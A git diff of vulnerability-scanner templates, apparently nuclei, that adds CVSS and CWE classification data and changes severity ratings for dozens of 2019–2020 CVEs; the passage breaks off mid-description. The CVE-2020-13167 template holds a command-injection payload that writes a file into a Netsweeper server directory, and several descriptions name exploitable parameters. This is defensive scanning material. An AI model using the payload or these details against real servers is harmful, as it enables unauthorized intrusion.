WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion (LFI) author: daffainfo - severity: high + severity: critical description: The GraceMedia Media Player plugin 1.0 for WordPress allows Local File Inclusion via the cfg parameter. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618 @@ -11,6 +11,11 @@ info: - https://www.exploit-db.com/exploits/46537 - https://nvd.nist.gov/vuln/detail/CVE-2019-9618 tags: cve,cve2019,wordpress,wp-plugin,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-9618 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2019/CVE-2019-9670.yaml b/cves/2019/CVE-2019-9670.yaml index 059f75bb43..baeb281791 100644 --- a/cves/2019/CVE-2019-9670.yaml +++ b/cves/2019/CVE-2019-9670.yaml @@ -6,6 +6,18 @@ info: author: ree4pwn severity: critical tags: cve,cve2019,zimbra,xxe + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-9670 + cwe-id: CWE-611 + reference: + - https://www.exploit-db.com/exploits/46693/ + - https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories + - https://bugzilla.zimbra.com/show_bug.cgi?id=109129 + - http://www.rapid7.com/db/modules/exploit/linux/http/zimbra_xxe_rce + - http://packetstormsecurity.com/files/152487/Zimbra-Collaboration-Autodiscover-Servlet-XXE-ProxyServlet-SSRF.html + - https://isc.sans.edu/forums/diary/CVE20199670+Zimbra+Collaboration+Suite+XXE+vulnerability/27570/ requests: - raw: diff --git a/cves/2019/CVE-2019-9733.yaml b/cves/2019/CVE-2019-9733.yaml index 7a4bf4d89d..91b8589da2 100644 --- a/cves/2019/CVE-2019-9733.yaml +++ b/cves/2019/CVE-2019-9733.yaml @@ -10,6 +10,10 @@ info: - https://www.ciphertechs.com/jfrog-artifactory-advisory/ - https://www.jfrog.com/confluence/display/RTF/Release+Notes#ReleaseNotes-Artifactory6.8.6 tags: cve,cve2019,artifactory + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-9733 requests: - raw: diff --git a/cves/2019/CVE-2019-9955.yaml b/cves/2019/CVE-2019-9955.yaml index 5c6356d56d..ed6ed3a6cf 100644 --- a/cves/2019/CVE-2019-9955.yaml +++ b/cves/2019/CVE-2019-9955.yaml @@ -3,7 +3,7 @@ id: CVE-2019-9955 info: name: CVE-2019-9955 Zyxel XSS author: pdteam - severity: low + severity: medium tags: cve,cve2019,xss description: On Zyxel ATP200, ATP500, ATP800, USG20-VPN, USG20W-VPN, USG40, USG40W, USG60, USG60W, USG110, USG210, USG310, USG1100, USG1900, USG2200-VPN, ZyWALL 110, ZyWALL 310, ZyWALL 1100 devices, the security firewall login page is vulnerable to Reflected XSS via the unsanitized 'mp_idx' parameter. reference: @@ -12,6 +12,11 @@ info: https://www.exploit-db.com/exploits/46706/ https://www.securitymetrics.com/blog/Zyxel-Devices-Vulnerable-Cross-Site-Scripting-Login-page https://www.zyxel.com/support/reflected-cross-site-scripting-vulnerability-of-firewalls.shtml + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-9955 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2019/CVE-2019-9978.yaml b/cves/2019/CVE-2019-9978.yaml index 871ea7acfb..4b3b772039 100644 --- a/cves/2019/CVE-2019-9978.yaml +++ b/cves/2019/CVE-2019-9978.yaml @@ -3,10 +3,15 @@ id: CVE-2019-9978 info: name: WordPress social-warfare RFI author: madrobot,dwisiswant0 - severity: critical + severity: medium description: The social-warfare plugin before 3.5.3 for WordPress has stored XSS via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, as exploited in the wild in March 2019. This affects Social Warfare and Social Warfare Pro. reference: https://github.com/mpgn/CVE-2019-9978 tags: cve,cve2019,wordpress,wp-plugin,ssrf + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-9978 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-0618.yaml b/cves/2020/CVE-2020-0618.yaml index b593db8f88..acbb89de1a 100644 --- a/cves/2020/CVE-2020-0618.yaml +++ b/cves/2020/CVE-2020-0618.yaml @@ -12,6 +12,11 @@ info: - https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/ - https://github.com/euphrat1ca/CVE-2020-0618 tags: cve,cve2020,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-0618 + cwe-id: CWE-502 requests: - method: GET diff --git a/cves/2020/CVE-2020-10148.yaml b/cves/2020/CVE-2020-10148.yaml index f7958eb7cb..2aa69a564f 100644 --- a/cves/2020/CVE-2020-10148.yaml +++ b/cves/2020/CVE-2020-10148.yaml @@ -3,7 +3,7 @@ id: CVE-2020-10148 info: name: SolarWinds Orion API Auth Bypass Leads to RCE (SUPERNOVA) author: dwisiswant0 - severity: high + severity: critical description: | This template could allow to bypass authentication and execute API commands which may result in a compromise of the SolarWinds instance. @@ -13,6 +13,11 @@ info: - https://gist.github.com/0xsha/75616ef6f24067c4fb5b320c5dfa4965 - https://twitter.com/0xsha/status/1343800953946787847 tags: cve,cve2020,solarwinds,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-10148 + cwe-id: CWE-287 requests: - method: GET diff --git a/cves/2020/CVE-2020-10546.yaml b/cves/2020/CVE-2020-10546.yaml index 658064e6d2..a7e3cdd179 100644 --- a/cves/2020/CVE-2020-10546.yaml +++ b/cves/2020/CVE-2020-10546.yaml @@ -2,12 +2,17 @@ id: CVE-2020-10546 info: name: rConfig 3.9.4 SQLi author: madrobot - severity: high + severity: critical description: rConfig 3.9.4 and previous versions has unauthenticated compliancepolicies.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices. reference: - https://github.com/theguly/exploits/blob/master/CVE-2020-10546.py - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/ tags: cve,cve2020,rconfig,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-10546 + cwe-id: CWE-89,CWE-522 requests: - method: GET diff --git a/cves/2020/CVE-2020-10547.yaml b/cves/2020/CVE-2020-10547.yaml index 4213adc816..445f4d31d4 100644 --- a/cves/2020/CVE-2020-10547.yaml +++ b/cves/2020/CVE-2020-10547.yaml @@ -2,12 +2,17 @@ id: CVE-2020-10547 info: name: rConfig 3.9.4 SQLi author: madrobot - severity: high + severity: critical description: rConfig 3.9.4 and previous versions has unauthenticated compliancepolicyelements.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices. reference: https://github.com/theguly/exploits/blob/master/CVE-2020-10547.py https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/ tags: cve,cve2020,rconfig,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-10547 + cwe-id: CWE-89,CWE-522 requests: - method: GET diff --git a/cves/2020/CVE-2020-10548.yaml b/cves/2020/CVE-2020-10548.yaml index d5d9e17baf..fb420c8e1b 100644 --- a/cves/2020/CVE-2020-10548.yaml +++ b/cves/2020/CVE-2020-10548.yaml @@ -2,12 +2,17 @@ id: CVE-2020-10548 info: name: rConfig 3.9.4 SQLi author: madrobot - severity: high + severity: critical description: rConfig 3.9.4 and previous versions has unauthenticated devices.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices. reference: - https://github.com/theguly/exploits/blob/master/CVE-2020-10548.py - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/ tags: cve,cve2020,rconfig,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-10548 + cwe-id: CWE-89,CWE-522 requests: - method: GET diff --git a/cves/2020/CVE-2020-10549.yaml b/cves/2020/CVE-2020-10549.yaml index 7447d9e4c9..9a05c1f547 100644 --- a/cves/2020/CVE-2020-10549.yaml +++ b/cves/2020/CVE-2020-10549.yaml @@ -2,12 +2,17 @@ id: CVE-2020-10549 info: name: rConfig 3.9.4 SQLi author: madrobot - severity: high + severity: critical description: rConfig 3.9.4 and previous versions has unauthenticated snippets.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices. reference: - https://github.com/theguly/exploits/blob/master/CVE-2020-10549.py - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/ tags: cve,cve2020,rconfig,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-10549 + cwe-id: CWE-89,CWE-522 requests: - method: GET diff --git a/cves/2020/CVE-2020-11034.yaml b/cves/2020/CVE-2020-11034.yaml index c43c5b0539..46bc230027 100644 --- a/cves/2020/CVE-2020-11034.yaml +++ b/cves/2020/CVE-2020-11034.yaml @@ -3,13 +3,18 @@ id: CVE-2020-11034 info: name: GLPI v.9.4.6 - Open redirect author: pikpikcu - severity: low + severity: medium description: In GLPI before version 9.4.6, there is a vulnerability that allows bypassing the open redirect protection, which is based on a regexp. This is fixed in version 9.4.6. reference: - https://github.com/glpi-project/glpi/security/advisories/GHSA-gxv6-xq9q-37hg - https://github.com/glpi-project/glpi/archive/9.4.6.zip - https://nvd.nist.gov/vuln/detail/CVE-2020-11034 tags: cve,cve2020,redirect + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-11034 + cwe-id: CWE-601 requests: diff --git a/cves/2020/CVE-2020-11110.yaml b/cves/2020/CVE-2020-11110.yaml index 09b3133b28..da0bf70b6c 100644 --- a/cves/2020/CVE-2020-11110.yaml +++ b/cves/2020/CVE-2020-11110.yaml @@ -9,6 +9,11 @@ info: reference: - https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html - https://nvd.nist.gov/vuln/detail/CVE-2020-11110 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-11110 + cwe-id: CWE-79 requests: - raw: - | diff --git a/cves/2020/CVE-2020-11455.yaml b/cves/2020/CVE-2020-11455.yaml index 88231d2864..99abf2cac1 100644 --- a/cves/2020/CVE-2020-11455.yaml +++ b/cves/2020/CVE-2020-11455.yaml @@ -3,12 +3,17 @@ id: CVE-2020-11455 info: name: LimeSurvey 4.1.11 - Path Traversal author: daffainfo - severity: high + severity: medium description: LimeSurvey before 4.1.12+200324 contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php. reference: - https://www.exploit-db.com/exploits/48297 - https://www.cvedetails.com/cve/CVE-2020-11455 tags: cve,cve2020,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-11455 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-11547.yaml b/cves/2020/CVE-2020-11547.yaml index 80fa059eb9..c9b6f8c040 100644 --- a/cves/2020/CVE-2020-11547.yaml +++ b/cves/2020/CVE-2020-11547.yaml @@ -9,6 +9,11 @@ info: - https://github.com/ch-rigu/CVE-2020-11547--PRTG-Network-Monitor-Information-Disclosure - https://nvd.nist.gov/vuln/detail/CVE-2020-11547 tags: cve,cve2020,prtg,disclosure + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-11547 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2020/CVE-2020-11710.yaml b/cves/2020/CVE-2020-11710.yaml index f5550ad166..038ff53d98 100644 --- a/cves/2020/CVE-2020-11710.yaml +++ b/cves/2020/CVE-2020-11710.yaml @@ -3,10 +3,14 @@ id: CVE-2020-11710 info: name: Kong Admin Rest API Unauth author: pikpikcu - severity: info + severity: critical description: An issue was discovered in docker-kong (for Kong) through 2.0.3. The admin API port may be accessible on interfaces other than 127.0.0.1. reference: https://nvd.nist.gov/vuln/detail/CVE-2020-11710 tags: cve,cve2020,kong + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-11710 requests: - method: GET diff --git a/cves/2020/CVE-2020-11738.yaml b/cves/2020/CVE-2020-11738.yaml index cfbb12b802..adec053def 100644 --- a/cves/2020/CVE-2020-11738.yaml +++ b/cves/2020/CVE-2020-11738.yaml @@ -13,6 +13,11 @@ info: reference: https://www.tenable.com/blog/duplicator-wordpress-plugin-vulnerability-exploited-in-the-wild tags: cve,cve2020,wordpress,wp-plugin,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-11738 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-11853.yaml b/cves/2020/CVE-2020-11853.yaml index 8e2f1ce615..4d9ba909d4 100644 --- a/cves/2020/CVE-2020-11853.yaml +++ b/cves/2020/CVE-2020-11853.yaml @@ -14,6 +14,10 @@ info: Originated from Metasploit module (#14654). tags: cve,cve2020,opm,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-11853 requests: - method: GET diff --git a/cves/2020/CVE-2020-11854.yaml b/cves/2020/CVE-2020-11854.yaml index 0f5f1bf477..710aa30a11 100644 --- a/cves/2020/CVE-2020-11854.yaml +++ b/cves/2020/CVE-2020-11854.yaml @@ -14,6 +14,11 @@ info: Originated from Metasploit module (#14654). tags: cve,cve2020,ucmdb,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-11854 + cwe-id: CWE-798 requests: - method: GET diff --git a/cves/2020/CVE-2020-11930.yaml b/cves/2020/CVE-2020-11930.yaml index 8561563078..9f8898694d 100644 --- a/cves/2020/CVE-2020-11930.yaml +++ b/cves/2020/CVE-2020-11930.yaml @@ -10,6 +10,11 @@ info: - https://wpscan.com/vulnerability/10181 - https://payatu.com/blog/gaurav/analysis-of-cve-2020-11930:-reflected-xss-in-gtranslate-wordpress-module tags: cve,cve2020,wordpress,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-11930 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-11978.yaml b/cves/2020/CVE-2020-11978.yaml index 1f966e8dc3..e5ec23bd48 100644 --- a/cves/2020/CVE-2020-11978.yaml +++ b/cves/2020/CVE-2020-11978.yaml @@ -9,6 +9,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2020-11978 - https://twitter.com/wugeej/status/1400336603604668418 tags: cve,cve2020,apache,airflow,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-11978 + cwe-id: CWE-77 requests: - raw: diff --git a/cves/2020/CVE-2020-11991.yaml b/cves/2020/CVE-2020-11991.yaml index 043b9aeaa0..18b959d535 100644 --- a/cves/2020/CVE-2020-11991.yaml +++ b/cves/2020/CVE-2020-11991.yaml @@ -8,6 +8,11 @@ info: description: | When using the StreamGenerator, the code parse a user-provided XML. A specially crafted XML, including external system entities, could be used to access any file on the server system. reference: https://lists.apache.org/thread.html/r77add973ea521185e1a90aca00ba9dae7caa8d8b944d92421702bb54%40%3Cusers.cocoon.apache.org%3E + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-11991 + cwe-id: CWE-611 requests: - method: POST diff --git a/cves/2020/CVE-2020-12054.yaml b/cves/2020/CVE-2020-12054.yaml index 60bcb223fb..0ee177bbaf 100644 --- a/cves/2020/CVE-2020-12054.yaml +++ b/cves/2020/CVE-2020-12054.yaml @@ -7,6 +7,11 @@ info: description: The Catch Breadcrumb plugin before 1.5.4 for WordPress allows Reflected XSS via the s parameter (a search query). reference: https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4 tags: cve,cve2020,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-12054 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-12116.yaml b/cves/2020/CVE-2020-12116.yaml index 32023cb990..696fd1ce4f 100644 --- a/cves/2020/CVE-2020-12116.yaml +++ b/cves/2020/CVE-2020-12116.yaml @@ -7,6 +7,11 @@ info: description: Zoho ManageEngine OpManager Stable build before 124196 and Released build before 125125 allows an unauthenticated attacker to read arbitrary files on the server by sending a crafted request. tags: cve,cve2020,zoho,lfi reference: https://github.com/BeetleChunks/CVE-2020-12116 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-12116 + cwe-id: CWE-22 requests: - raw: diff --git a/cves/2020/CVE-2020-12720.yaml b/cves/2020/CVE-2020-12720.yaml index 289db507b6..a187f2e53f 100644 --- a/cves/2020/CVE-2020-12720.yaml +++ b/cves/2020/CVE-2020-12720.yaml @@ -7,6 +7,11 @@ info: description: vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control. reference: https://github.com/rekter0/exploits/tree/master/CVE-2020-12720 tags: cve,cve2020,vbulletin,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-12720 + cwe-id: CWE-89,CWE-306 requests: - raw: diff --git a/cves/2020/CVE-2020-12800.yaml b/cves/2020/CVE-2020-12800.yaml index 8216d0e966..3f57c57e69 100644 --- a/cves/2020/CVE-2020-12800.yaml +++ b/cves/2020/CVE-2020-12800.yaml @@ -7,6 +7,11 @@ info: description: The drag-and-drop-multiple-file-upload-contact-form-7 plugin before 1.3.3.3 for WordPress allows Unrestricted File Upload and remote code execution by setting supported_type to php% and uploading a .php% file. reference: https://github.com/amartinsec/CVE-2020-12800 tags: cve,cve2020,wordpress,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-12800 + cwe-id: CWE-434 requests: - raw: diff --git a/cves/2020/CVE-2020-13117.yaml b/cves/2020/CVE-2020-13117.yaml index a1f55821f9..481f68259a 100644 --- a/cves/2020/CVE-2020-13117.yaml +++ b/cves/2020/CVE-2020-13117.yaml @@ -8,6 +8,11 @@ info: reference: - https://blog.0xlabs.com/2021/02/wavlink-rce-CVE-2020-13117.html tags: cve,cve2020,wavlink,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-13117 + cwe-id: CWE-77 requests: - raw: diff --git a/cves/2020/CVE-2020-13167.yaml b/cves/2020/CVE-2020-13167.yaml index 961d153f44..be49883637 100644 --- a/cves/2020/CVE-2020-13167.yaml +++ b/cves/2020/CVE-2020-13167.yaml @@ -11,6 +11,11 @@ info: - https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says additional-fields: hex-payload: 'echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out' + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-13167 + cwe-id: CWE-78 requests: - method: GET diff --git a/cves/2020/CVE-2020-13483.yaml b/cves/2020/CVE-2020-13483.yaml index 93175bfeeb..943d37ec28 100644 --- a/cves/2020/CVE-2020-13483.yaml +++ b/cves/2020/CVE-2020-13483.yaml @@ -3,10 +3,15 @@ id: CVE-2020-13483 info: name: Bitrix24 through 20.0.0 allows XSS author: pikpikcu - severity: high + severity: medium reference: https://gist.github.com/mariuszpoplwski/ca6258cf00c723184ebd2228ba81f558 description: The Web Application Firewall in Bitrix24 through 20.0.0 allows XSS via the items[ITEMS][ID] parameter to the components/bitrix/mobileapp.list/ajax.php/ URI. tags: cve,cve2020,xss,bitrix + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-13483 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-13700.yaml b/cves/2020/CVE-2020-13700.yaml index 844a1401f5..13693b822a 100644 --- a/cves/2020/CVE-2020-13700.yaml +++ b/cves/2020/CVE-2020-13700.yaml @@ -10,6 +10,11 @@ info: It allows an insecure direct object reference via permalinks manipulation, as demonstrated by a wp-json/acf/v3/options/ request that reads sensitive information in the wp_options table, such as the login and pass values. tags: cve,cve2020,wordpress + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-13700 + cwe-id: CWE-639 requests: - method: GET diff --git a/cves/2020/CVE-2020-13927.yaml b/cves/2020/CVE-2020-13927.yaml index 4d8a08fa63..b9095c970e 100644 --- a/cves/2020/CVE-2020-13927.yaml +++ b/cves/2020/CVE-2020-13927.yaml @@ -5,6 +5,14 @@ info: author: pdteam severity: critical tags: cve,cve2020,apache,airflow,unauth + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-13927 + description: "The previous default setting for Airflow's Experimental API was to allow all API requests without authentication, but this poses security risks to users who miss this fact. From Airflow 1.10.11 the default has been changed to deny all requests by default and is documented at https://airflow.apache.org/docs/1.10.11/security.html#api-authentication. Note this change fixes it for new installs but existing users need to change their config to default `[api]auth_backend = airflow.api.auth.backend.deny_all` as mentioned in the Updating Guide: https://github.com/apache/airflow/blob/1.10.11/UPDATING.md#experimental-api-will-deny-all-request-by-default" + reference: + - https://lists.apache.org/thread.html/r23a81b247aa346ff193670be565b2b8ea4b17ddbc7a35fc099c1aadd%40%3Cdev.airflow.apache.org%3E + - http://packetstormsecurity.com/files/162908/Apache-Airflow-1.10.10-Remote-Code-Execution.html requests: - method: GET diff --git a/cves/2020/CVE-2020-13937.yaml b/cves/2020/CVE-2020-13937.yaml index be27c3f3a9..28936101f5 100644 --- a/cves/2020/CVE-2020-13937.yaml +++ b/cves/2020/CVE-2020-13937.yaml @@ -15,6 +15,11 @@ info: - https://kylin.apache.org/docs/release_notes.html - https://s.tencent.com/research/bsafe/1156.html tags: cve,cve2020,apache + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-13937 + cwe-id: CWE-922 requests: - method: GET diff --git a/cves/2020/CVE-2020-13942.yaml b/cves/2020/CVE-2020-13942.yaml index 6f29058963..45757b968d 100644 --- a/cves/2020/CVE-2020-13942.yaml +++ b/cves/2020/CVE-2020-13942.yaml @@ -15,6 +15,11 @@ info: - https://securityboulevard.com/2020/11/apache-unomi-cve-2020-13942-rce-vulnerabilities-discovered/ - https://twitter.com/chybeta/status/1328912309440311297 tags: cve,cve2020,apache,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-13942 + cwe-id: CWE-74 requests: - method: POST diff --git a/cves/2020/CVE-2020-14092.yaml b/cves/2020/CVE-2020-14092.yaml index d23c7a5782..50f652bb22 100644 --- a/cves/2020/CVE-2020-14092.yaml +++ b/cves/2020/CVE-2020-14092.yaml @@ -7,6 +7,11 @@ info: description: WordPress Payment Form For Paypal Pro 'query' parameter allows for any unauthenticated user to perform SQL queries with result output to a web page in JSON format. reference: https://wpscan.com/vulnerability/10287 tags: cve,cve2020,wordpress,wp-plugin,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-14092 + cwe-id: CWE-89 requests: - method: GET diff --git a/cves/2020/CVE-2020-14179.yaml b/cves/2020/CVE-2020-14179.yaml index 116f824ef7..d586846e72 100644 --- a/cves/2020/CVE-2020-14179.yaml +++ b/cves/2020/CVE-2020-14179.yaml @@ -7,6 +7,10 @@ info: description: Affected versions of Atlassian Jira Server and Data Center allow remote, unauthenticated attackers to view custom field names and custom SLA names via an Information Disclosure vulnerability in the /secure/QueryComponent!Default.jspa endpoint. The affected versions are before version 8.5.8, and from version 8.6.0 before 8.11.1. reference: https://jira.atlassian.com/browse/JRASERVER-71536 tags: cve,cve2020,atlassian,jira + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-14179 requests: - method: GET diff --git a/cves/2020/CVE-2020-14181.yaml b/cves/2020/CVE-2020-14181.yaml index d50f1e806d..a71ed9dfb5 100644 --- a/cves/2020/CVE-2020-14181.yaml +++ b/cves/2020/CVE-2020-14181.yaml @@ -9,6 +9,11 @@ info: - https://jira.atlassian.com/browse/JRASERVER-71560 - http://packetstormsecurity.com/files/161730/Atlassian-JIRA-8.11.1-User-Enumeration.html tags: cve,cve2020,atlassian,jira + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-14181 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2020/CVE-2020-14413.yaml b/cves/2020/CVE-2020-14413.yaml index 5cbe2e48a3..e260ce4ca9 100644 --- a/cves/2020/CVE-2020-14413.yaml +++ b/cves/2020/CVE-2020-14413.yaml @@ -7,6 +7,11 @@ info: reference: https://gist.github.com/farid007/8db2ab5367ba00e87f9479b32d46fea8 description: NeDi 1.9C is vulnerable to XSS because of an incorrect implementation of sanitize() in inc/libmisc.php. This function attempts to escape the SCRIPT tag from user-controllable values, but can be easily bypassed, as demonstrated by an onerror attribute of an IMG element as a Devices-Config.php?sta= value. tags: cve,cve2020,nedi,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-14413 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2020/CVE-2020-14864.yaml b/cves/2020/CVE-2020-14864.yaml index 65f3b7b0f5..f46615666a 100644 --- a/cves/2020/CVE-2020-14864.yaml +++ b/cves/2020/CVE-2020-14864.yaml @@ -10,6 +10,10 @@ info: - https://www.oracle.com/security-alerts/cpuoct2020.html additional-fields: cvss: 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N' + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-14864 requests: - method: GET diff --git a/cves/2020/CVE-2020-14882.yaml b/cves/2020/CVE-2020-14882.yaml index 8544701f97..50635623d5 100644 --- a/cves/2020/CVE-2020-14882.yaml +++ b/cves/2020/CVE-2020-14882.yaml @@ -18,6 +18,10 @@ info: attacker with network access via HTTP to compromise the server. Successful attacks of this vulnerability can result in takeover. tags: cve,cve2020,oracle,rce,weblogic + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-14882 requests: - raw: diff --git a/cves/2020/CVE-2020-14883.yaml b/cves/2020/CVE-2020-14883.yaml index 9deaa4c983..92e76199c0 100644 --- a/cves/2020/CVE-2020-14883.yaml +++ b/cves/2020/CVE-2020-14883.yaml @@ -3,10 +3,14 @@ id: CVE-2020-14883 info: name: Oracle WebLogic Server Administration Console Handle RCE author: pdteam - severity: critical + severity: high description: Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged 